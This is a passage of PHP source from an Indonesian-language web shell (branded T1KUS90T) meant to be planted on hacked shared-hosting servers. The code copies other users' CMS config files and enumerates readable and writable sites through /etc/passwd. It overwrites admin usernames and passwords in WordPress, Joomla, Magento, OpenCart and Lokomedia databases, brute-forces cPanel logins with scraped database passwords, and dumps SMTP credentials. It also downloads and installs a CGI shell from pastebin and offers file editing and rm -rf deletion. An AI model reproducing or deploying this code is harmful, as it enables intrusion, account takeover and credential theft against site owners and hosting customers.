						"/home/$user_tg/public_html/slconfig.php" => "Sitelok",
						"/home/$user_tg/public_html/application/config/database.php" => "Ellislab");
					foreach($grab_config as $config => $nama_config) {
						$ambil_config = file_get_contents($config);
						if($ambil_config == '') {
						} else {
							$file_config = fopen("tg_config/$user_tg-$nama_config.txt","w");
							fputs($file_config,$ambil_config);
						}
					}
				}		
			}
		}	
	}
	echo "<center><a href='?dir=$dir/tg_config'><font color=lime>Done</font></a></center>";
} elseif($_GET['do'] == 'jumping') {
	$i = 0;
	echo "<div class='margin: 5px auto;'>";
	if(preg_match("/hsphere/", $dir)) {
		$urls = explode("
", $_POST['url']);
		if(isset($_POST['jump'])) {
			echo "<pre>";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
							if(is_writable($url_user)) {
								$jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
							}
							echo $jrw."<br>";
						}
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
		} else {
			echo '<center>
				  <form method="post">
				  List Domains: <br>
				  <textarea name="url" style="width: 500px; height: 250px;">';
			$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
			while($getss = fgets($fp)) {
				echo $getss;
			}
			echo  '</textarea><br>
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
				  </form></center>';
		}
	} elseif(preg_match("/vhosts/", $dir)) {
		$urls = explode("
", $_POST['url']);
		if(isset($_POST['jump'])) {
			echo "<pre>";
			foreach($urls as $url) {
				$web_vh = "/var/www/vhosts/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
						if(is_writable($web_vh)) {
							$jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
						}
						echo $jrw."<br>";
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
		} else {
			echo '<center>
				  <form method="post">
				  List Domains: <br>
				  <textarea name="url" style="width: 500px; height: 250px;">';
				  bing("ip:$ip");
			echo  '</textarea><br>
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
				  </form></center>';
		}
	} else {
		echo "<pre>";
		$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_tg_jump) {
					$user_jumping_dir = "/home/$user_tg_jump/public_html";
					if(is_readable($user_jumping_dir)) {
						$i++;
						$jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");	
							if($domain_jump == '') {
								echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
							} else {
								preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
								foreach($domains_jump[1] as $dj) {
									$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
									$user_jumping_url = $user_jumping_url['name'];
									if($user_jumping_url == $user_tg_jump) {
										echo " => ( <u>$dj</u> )<br>";
										break;
									}
								}
							}
						} else {
							echo "<br>";
						}
					}
				}
			}
		}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
	}
	echo "</div>";
} elseif($_GET['do'] == 'auto_edit_user') {
	if($_POST['hajar']) {
		if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
			echo "username atau password harus lebih dari 6 karakter";
		} else {
			$user_baru = $_POST['user_baru'];
			$pass_baru = md5($_POST['pass_baru']);
			$conf = $_POST['config_dir'];
			$scan_conf = scandir($conf);
			foreach($scan_conf as $file_conf) {
				if(!is_file("$conf/$file_conf")) continue;
				$config = file_get_contents("$conf/$file_conf");
				if(preg_match("/JConfig|joomla/",$config)) {
					$dbhost = ambilkata($config,"host = '","'");
					$dbuser = ambilkata($config,"user = '","'");
					$dbpass = ambilkata($config,"password = '","'");
					$dbname = ambilkata($config,"db = '","'");
					$dbprefix = ambilkata($config,"dbprefix = '","'");
					$prefix = $dbprefix."users";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
					$result = mysql_fetch_array($q);
					$id = $result['id'];
					$site = ambilkata($config,"sitename = '","'");
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => Joomla<br>";
					if($site == '') {
						echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
					} else {
						echo "Sitename => $site<br>";
					}
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				} elseif(preg_match("/WordPress/",$config)) {
					$dbhost = ambilkata($config,"DB_HOST', '","'");
					$dbuser = ambilkata($config,"DB_USER', '","'");
					$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
					$dbname = ambilkata($config,"DB_NAME', '","'");
					$dbprefix = ambilkata($config,"table_prefix  = '","'");
					$prefix = $dbprefix."users";
					$option = $dbprefix."options";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
					$result = mysql_fetch_array($q);
					$id = $result[ID];
					$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
					$result2 = mysql_fetch_array($q2);
					$target = $result2[option_value];
					if($target == '') {
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
					} else {
						$url_target = "Login => <a href='$target/wp-admin/plugin-install.php?tab=upload' target='_blank'><u>$target/wp-login.php</u></a><br>";
					}
					$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => Wordpress<br>";
					echo $url_target;
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				} elseif(preg_match("/Magento|Mage_Core/",$config)) {
					$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
					$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
					$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
					$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
					$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
					$prefix = $dbprefix."admin_user";
					$option = $dbprefix."core_config_data";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
					$result = mysql_fetch_array($q);
					$id = $result[user_id];
					$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
					$result2 = mysql_fetch_array($q2);
					$target = $result2[value];
					if($target == '') {
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
					} else {
						$url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
					}
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => Magento<br>";
					echo $url_target;
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
					$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
					$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
					$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
					$dbname = ambilkata($config,"'DB_DATABASE', '","'");
					$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
					$prefix = $dbprefix."user";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
					$result = mysql_fetch_array($q);
					$id = $result[user_id];
					$target = ambilkata($config,"HTTP_SERVER', '","'");
					if($target == '') {
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
					} else {
						$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
					}
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => OpenCart<br>";
					echo $url_target;
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
					$dbhost = ambilkata($config,'server = "','"');
					$dbuser = ambilkata($config,'username = "','"');
					$dbpass = ambilkata($config,'password = "','"');
					$dbname = ambilkata($config,'database = "','"');
					$prefix = "users";
					$option = "identitas";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
					$result = mysql_fetch_array($q);
					$target = $result[alamat_website];
					if($target == '') {
						$target2 = $result[url];
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
						if($target2 == '') {
							$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
						} else {
							$cek_login3 = file_get_contents("$target2/adminweb/");
							$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
							if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
								$url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
							} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
								$url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
							} else {
								$url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
							}
						}
					} else {
						$cek_login = file_get_contents("$target/adminweb/");
						$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
						if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
							$url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
						} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
							$url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
						} else {
							$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
						}
					}
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => Lokomedia<br>";
					if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
						echo $url_target2;
					} else {
						echo $url_target;
					}
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				}
			}
		}
	} else {
		echo "<center>
		<h1>Auto Edit User Config</h1>
		<form method='post'>
		DIR Config: <br>
		<input type='text' size='50' name='config_dir' value='$dir'><br><br>
		Set User & Pass: <br>
		<input type='text' name='user_baru' value='T1KUS90T' placeholder='user_baru'><br>
		<input type='text' name='pass_baru' value='T1KUS90T' placeholder='pass_baru'><br>
		<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
		</form>
		<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
		";
	}
} elseif($_GET['do'] == 'cpanel') {
	if($_POST['crack']) {
		$usercp = explode("
", $_POST['user_cp']);
		$passcp = explode("
", $_POST['pass_cp']);
		$i = 0;
		foreach($usercp as $ucp) {
			foreach($passcp as $pcp) {
				if(@mysql_connect('localhost', $ucp, $pcp)) {
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
					} else {
						$_SESSION[$ucp] = "1";
						$_SESSION[$pcp] = "1";
						if($ucp == '' || $pcp == '') {
							
						} else {
							$i++;
							if(function_exists('posix_getpwuid')) {
								$domain_cp = file_get_contents("/etc/named.conf");	
								if($domain_cp == '') {
									$dom =  "<font color=red>gabisa ambil nama domain nya</font>";
								} else {
									preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
									foreach($domains_cp[1] as $dj) {
										$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
										$user_cp_url = $user_cp_url['name'];
										if($user_cp_url == $ucp) {
											$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
											break;
										}
									}
								}
							} else {
								$dom = "<font color=red>function is Disable by system</font>";
							}
							echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
						}
					}
				}
			}
		}
		if($i == 0) {
		} else {
			echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>T1KUS90T.</font>";
		}
	} else {
		echo "<center>
		<form method='post'>
		USER: <br>
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
		$_usercp = fopen("/etc/passwd","r");
		while($getu = fgets($_usercp)) {
			if($getu == '' || !$_usercp) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all("/(.*?):x:/", $getu, $u);
				foreach($u[1] as $user_cp) {
						if(is_dir("/home/$user_cp/public_html")) {
							echo "$user_cp
";
					}
				}
			}
		}
		echo "</textarea><br>
		PASS: <br>
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
		function cp_pass($dir) {
			$pass = "";
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				if(!is_file("$dir/$dirb")) continue;
				$ambil = file_get_contents("$dir/$dirb");
				if(preg_match("/WordPress/", $ambil)) {
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."
";
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
					$pass .= ambilkata($ambil,"password = '","'")."
";
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."
";
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
					$pass .= ambilkata($ambil,'password = "','"')."
";
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."
";
				} elseif(preg_match("/^[client]$/", $ambil)) {
					preg_match("/password=(.*?)/", $ambil, $pass1);
					if(preg_match('/"/', $pass1[1])) {
						$pass1[1] = str_replace('"', "", $pass1[1]);
						$pass .= $pass1[1]."
";
					} else {
						$pass .= $pass1[1]."
";
					}
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
					$pass .= ambilkata($ambil,"db_password = '","'")."
";
				}
			}
			echo $pass;
		}
		$cp_pass = cp_pass($dir);
		echo $cp_pass;
		echo "</textarea><br>
		<input type='submit' name='crack' style='width: 450px;' value='Crack'>
		</form>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
	}
} elseif($_GET['do'] == 'smtp') {
	echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
	function scj($dir) {
		$dira = scandir($dir);
		foreach($dira as $dirb) {
			if(!is_file("$dir/$dirb")) continue;
			$ambil = file_get_contents("$dir/$dirb");
			$ambil = str_replace("$", "", $ambil);
			if(preg_match("/JConfig|joomla/", $ambil)) {
				$smtp_host = ambilkata($ambil,"smtphost = '","'");
				$smtp_auth = ambilkata($ambil,"smtpauth = '","'");
				$smtp_user = ambilkata($ambil,"smtpuser = '","'");
				$smtp_pass = ambilkata($ambil,"smtppass = '","'");
				$smtp_port = ambilkata($ambil,"smtpport = '","'");
				$smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
				echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
				echo "SMTP port: <font color=lime>$smtp_port</font><br>";
				echo "SMTP user: <font color=lime>$smtp_user</font><br>";
				echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
				echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
				echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
			}
		}
	}
	$smpt_hunter = scj($dir);
	echo $smpt_hunter;
} elseif($_GET['do'] == 'cgi') {
	$cgi_dir = mkdir('tg_cgi', 0755);
	$file_cgi = "tg_cgi/cgi.izo";
	$isi_htcgi = "AddHandler cgi-script .izo";
	$htcgi = fopen(".htaccess", "w");
	$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
	$cgi = fopen($file_cgi, "w");
	fwrite($cgi, $cgi_script);
	fwrite($htcgi, $isi_htcgi);
	chmod($file_cgi, 0755);
	echo "<iframe src='tg_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";

} elseif($_GET['do'] == 'adminer') {
	$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
	function adminer($url, $isi) {
		$fp = fopen($isi, "w");
		$ch = curl_init();
		 	  curl_setopt($ch, CURLOPT_URL, $url);
		 	  curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
		 	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		 	  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		   	  curl_setopt($ch, CURLOPT_FILE, $fp);
		return curl_exec($ch);
		   	  curl_close($ch);
		fclose($fp);
		ob_flush();
		flush();
	}
	if(file_exists('adminer.php')) {
		echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
	} else {
		if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
			echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
		} else {
			echo "<center><font color=red>gagal buat file adminer</font></center>";
		}
	}
} elseif($_GET['act'] == 'newfile') {
	if($_POST['new_save_file']) {
		$newfile = htmlspecialchars($_POST['newfile']);
		$fopen = fopen($newfile, "a+");
		if($fopen) {
			$act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	}
	echo $act;
	echo "<form method='post'>
	Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
	<input type='submit' name='new_save_file' value='Submit'>
	</form>";
} elseif($_GET['act'] == 'newfolder') {
	if($_POST['new_save_folder']) {
		$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
		if(!mkdir($new_folder)) {
			$act = "<font color=red>permission denied</font>";
		} else {
			$act = "<script>window.location='?dir=".$dir."';</script>";
		}
	}
	echo $act;
	echo "<form method='post'>
	Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
	<input type='submit' name='new_save_folder' value='Submit'>
	</form>";
} elseif($_GET['act'] == 'rename_dir') {
	if($_POST['dir_rename']) {
		$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
		if($dir_rename) {
			$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	echo "".$act."<br>";
	}
	echo "<form method='post'>
	<input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
	<input type='submit' name='dir_rename' value='rename'>
	</form>";
} elseif($_GET['act'] == 'delete_dir') {
	if(is_dir($dir)) {
		if(is_writable($dir)) {
			@rmdir($dir);
			@exe("rm -rf $dir");
			@exe("rmdir /s /q $dir");
			$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
		} else {
			$act = "<font color=red>could not remove ".basename($dir)."</font>";
		}
	}
	echo $act;
} elseif($_GET['act'] == 'view') {
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
	if($_POST['save']) {
		$save = file_put_contents($_GET['file'], $_POST['src']);
		if($save) {
			$act = "<font color=lime>Saved!</font>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	echo "".$act."<br>";
	}
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<form method='post'>
	<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
	<input type='submit' value='Save' name='save' style='width: 500px;'>
	</form>";
} elseif($_GET['act'] == 'rename') {
	if($_POST['do_rename']) {
		$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
		if($rename) {
			$act = "<script>window.location='?dir=".$dir."';</script>";
		} else {
			$act = "<font color=red>permission denied</font>";
		}
	echo "".$act."<br>";
	}
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<form method='post'>
	<input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
	<input type='submit' name='do_rename' value='rename'>
	</form>";
} elseif($_GET['act'] == 'chmod') {
  $mode = $_POST['mode'];
  if($_POST['do_chmod']) {
    $chmod = @chmod($_GET['file'], $mode);
    if($chmod) {
      $act = "<script>window.location='?dir=".$dir."';</script>";
		} else {
			$act = "<font color=red>permission denied</font>";
    }
  echo "".$act."<br>";
  }
	echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'><b>chmod</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
	echo "<form method='post'>
	<input type='text' value='0644' name='mode' style='width: 450px;' height='10'>
	<input type='submit' name='do_chmod' value='chmod'>
	</form>";
} elseif($_GET['act'] == 'delete') {
	$delete = unlink($_GET['file']);
	if($delete) {
		$act = "<script>window.location='?dir=".$dir."';</script>";
	} else {
		$act = "<font color=red>permission denied</font>";
	}
	echo $act;
} else {
	if(is_dir($dir) === true) {
		if(!is_readable($dir)) {
			echo "<font color=red>can't open directory. ( not readable )</font>";
		} else {
			echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
			
			<tr>
			<th class="th_home"><center>Name</center></th>
			<th class="th_home"><center>Type</center></th>
			<th class="th_home"><center>Size</center></th>
			<th class="th_home"><center>Last Modified</center></th>
			<th class="th_home"><center>Owner/Group</center></th>
			<th class="th_home"><center>Permission</center></th>
			<th class="th_home"><center>Action</center></th>
			</tr>';
			$scandir = scandir($dir);
			foreach($scandir as $dirx) {
				$dtype = filetype("$dir/$dirx");
				$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
				if(function_exists('posix_getpwuid')) {
					$downer = @posix_getpwuid(fileowner("$dir/$dirx"));
					$downer = $downer['name'];
				} else {
					//$downer = $uid;
					$downer = fileowner("$dir/$dirx");
				}
				if(function_exists('posix_getgrgid')) {
					$dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
					$dgrp = $dgrp['name'];
				} else {
					$dgrp = filegroup("$dir/$dirx");
				}
 				if(!is_dir("$dir/$dirx")) continue;
 				if($dirx === '..') {
 					$href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
 				} elseif($dirx === '.') {
 					$href = "<a href='?dir=$dir'>$dirx</a>";
 				} else {
 					$href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
 				}
 				if($dirx === '.' || $dirx === '..') {
 					$act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
 					} else {
 					$act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
 				}
 				echo "<tr>";
 				echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
				echo "<td class='td_home'><center>$dtype</center></td>";
				echo "<td class='td_home'><center>-</center></th></td>";
				echo "<td class='td_home'><center>$dtime</center></td>";
				echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
				echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
				echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
				echo "</tr>";
			}
		}
	} else {
		echo "<font color=red>can't open directory.</font>";
	}
		foreach($scandir as $file) {
			$ftype = filetype("$dir/$file");
			$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
			$size = filesize("$dir/$file")/1024;
			$size = round($size,3);
			if(function_exists('posix_getpwuid')) {
				$fowner = @posix_getpwuid(fileowner("$dir/$file"));
				$fowner = $fowner['name'];
			} else {
				//$downer = $uid;
				$fowner = fileowner("$dir/$file");
			}
			if(function_exists('posix_getgrgid')) {
				$fgrp = @posix_getgrgid(filegroup("$dir/$file"));
				$fgrp = $fgrp['name'];
			} else {
				$fgrp = filegroup("$dir/$file");
			}
			if($size > 1024) {
				$size = round($size/1024,2). 'MB';
			} else {
				$size = $size. 'KB';
			}
			if(!is_file("$dir/$file")) continue;
			echo "<tr>";
